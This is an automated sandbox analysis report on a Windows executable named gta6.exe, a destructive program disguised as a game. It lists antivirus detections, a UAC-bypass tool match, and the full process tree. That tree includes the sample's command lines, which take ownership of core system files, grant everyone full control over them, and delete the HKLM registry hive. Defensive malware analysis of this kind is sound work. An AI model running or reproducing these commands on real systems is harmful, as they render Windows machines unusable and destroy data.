Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gta6.exe

Overview

General Information

Sample name:gta6.exe
Analysis ID:1544786
MD5:aaff8d22681e8bdee3c3ba55007f673f
SHA1:aa94b52ee5290629165387bb0e7bdf3600e7a073
SHA256:512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb
Tags:exeuser-MDMCk10
Infos:

Detection

UACMe
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected UACMe UAC Bypass tool
AI detected suspicious sample
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Recursive Takeown
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • gta6.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\gta6.exe" MD5: AAFF8D22681E8BDEE3C3BA55007F673F)
    • cmd.exe (PID: 6300 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • fsutil.exe (PID: 4472 cmdline: fsutil dirty query C: MD5: DE00EDA7134D3365E6074700E3008CAD)
      • takeown.exe (PID: 6964 cmdline: takeown /f C:\Windows\System32\hal.dll /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 3416 cmdline: icacls C:\Windows\System32\hal.dll /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 6208 cmdline: takeown /f C:\Windows\System32\winload.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 5444 cmdline: icacls C:\Windows\System32\winload.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 6448 cmdline: takeown /f C:\Windows\System32\winresume.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 6456 cmdline: icacls C:\Windows\System32\winresume.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 2868 cmdline: takeown /f C:\Windows\System32\winlogon.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 7040 cmdline: icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 5420 cmdline: takeown /f C:\Windows\System32\wininit.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 4092 cmdline: icacls C:\Windows\System32\wininit.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 1260 cmdline: takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 6132 cmdline: icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 6504 cmdline: takeown /f C:\Windows\System32\regedit.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 1448 cmdline: icacls C:\Windows\System32\regedit.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 5140 cmdline: takeown /f C:\Windows\System32\taskmgr.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 7040 cmdline: icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 3540 cmdline: takeown /f C:\Windows\System32\consent.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 1352 cmdline: icacls C:\Windows\System32\consent.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 5420 cmdline: takeown /f C:\Windows\System32\drivers /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 7044 cmdline: icacls C:\Windows\System32\drivers /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • reg.exe (PID: 6384 cmdline: reg delete HKLM /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
UACMeA toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.uacme
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: reg.exe PID: 6384JoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    Source: Process startedAuthor: frack113: Data: Command: takeown /f C:\Windows\System32\hal.dll /r /d y, CommandLine: takeown /f C:\Windows\System32\hal.dll /r /d y, CommandLine|base64offset|contains: , Image: C:\Windows\System32\takeown.exe, NewProcessName: C:\Windows\System32\takeown.exe, OriginalFileName: C:\Windows\System32\takeown.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6300, ParentProcessName: cmd.exe, ProcessCommandLine: takeown /f C:\Windows\System32\hal.dll /r /d y, ProcessId: 6964, ProcessName: takeown.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: gta6.exeAvira: detected
    Source: gta6.exeReversingLabs: Detection: 36%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
    Source: gta6.exeJoe Sandbox ML: detected

    Exploits

    barindex
    Source: Yara matchFile source: Process Memory Space: reg.exe PID: 6384, type: MEMORYSTR
    Source: Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user~1\Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user\AppData\Local\Temp\278F.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014000B64C NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW,0_2_000000014000B64C
    Source: C:\Windows\System32\cmd.exeFile deleted: C:\Windows\System32\drivers\DriverDataJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014001F8880_2_000000014001F888
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400138E50_2_00000001400138E5
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400154F00_2_00000001400154F0
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400151600_2_0000000140015160
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400151700_2_0000000140015170
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400131750_2_0000000140013175
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400102100_2_0000000140010210
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_00000001400162100_2_0000000140016210
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014001366E0_2_000000014001366E
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014000B7580_2_000000014000B758
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_0000000140012FDD0_2_0000000140012FDD
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /f
    Source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .vbprojCx
    Source: classification engineClassification label: mal72.expl.winEXE@46/2@0/0
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
    Source: C:\Users\user\Desktop\gta6.exeFile created: C:\Users\user\AppData\Local\Temp\278F.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
    Source: C:\Users\user\Desktop\gta6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: gta6.exeReversingLabs: Detection: 36%
    Source: unknownProcess created: C:\Users\user\Desktop\gta6.exe "C:\Users\user\Desktop\gta6.exe"
    Source: C:\Users\user\Desktop\gta6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /f
    Source: C:\Users\user\Desktop\gta6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d yJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /tJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /fJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\gta6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: gta6.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
    Source: C:\Users\user\Desktop\gta6.exeCode function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
    Source: initial sampleStatic PE information: section name: UPX0
    Source: initial sampleStatic PE information: section name: UPX1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
    Source: C:\Users\user\Desktop\gta6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\icacls.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\regedit.exeJump to behavior
    Source: C:\Windows\System32\icacls.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\Jump to behavior
    Source: C:\Windows\System32\icacls.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sys
    Source: C:\Windows\System32\takeown.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sys\Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exeWindow / User API: threadDelayed 982Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exe TID: 820Thread sleep count: 982 > 30Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user~1\Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user\AppData\Local\Temp\278F.tmpJump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
    Source: C:\Users\user\Desktop\gta6.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
    Source: reg.exe, 00000020.00000003.1600455731.0000024D350C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
    Source: reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598120945.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601887206.0000024D350D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
    Source: reg.exe, 00000020.00000003.1600387159.0000024D35802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts 